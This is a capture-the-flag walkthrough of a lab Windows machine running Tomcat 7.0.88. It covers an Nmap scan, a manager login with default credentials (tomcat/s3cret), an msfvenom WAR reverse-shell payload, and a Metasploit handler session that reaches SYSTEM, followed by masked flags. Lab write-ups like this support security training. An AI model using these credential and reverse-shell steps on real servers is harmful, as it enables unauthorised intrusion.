Introduction

OS: Windows
Difficulty: Easy
Points: 0
Release: 30 Jun, 2018
IP: 10.10.10.95

Enumeration

Nmap scan result

1
2
3
4
5
6
7
8
9
Nmap scan report for 10.10.10.95
Host is up (0.050s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1

Tomcat server is running on the port 8080.

User and Root Flag

With the default usernames and passwords, we attempted to access the Tomcat manager page

We were able to gain access after some attempts using the username tomcat and the password s3cret
img
Obtaining reverse shell requires uploading the war reverse shell payload to the Tomcat server.

Metasploit command to create a war meterpreter shell.

msfvenom -p java/meterpreter/reverse_tcp lhost=10.10.14.xx lport=1111 -f war -o sh.war

When you upload the payload, you need to set up the listener before triggering the reverse in Tomcat.

I always use meterpreter shell for Windows machines, but you can upload a shell that is not meterpreter as well.

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 > use multi/handler                                                 
[*] Using configured payload generic/shell_reverse_tcp                                                                
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp                                             
payload => windows/meterpreter/reverse_tcp                                                                            
msf6 exploit(multi/handler) > set lhost tun0                                                                          
lhost => tun0                                                                                                         
msf6 exploit(multi/handler) > set lport 1111                                                                          
lport => 1111                                                                                                         
msf6 exploit(multi/handler) > run                                                                                     
                                                                                                                      
[*] Started reverse TCP handler on 10.10.14.xx:1111                                                                   
[*] Sending stage (58829 bytes) to 10.10.10.95                                                                        
[*] Meterpreter session 1 opened (10.10.14.xx:1111 -> 10.10.10.95:49195)

Then we got shell as “NT authority/system

1
2
3
4
C:\apache-tomcat-7.0.88>whoami
nt authority\system

C:\apache-tomcat-7.0.88>

Got the user and root flag.

1
2
3
4
5
6
7
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcefxxxxxx

root.txt
04a8b36e1xxxxxx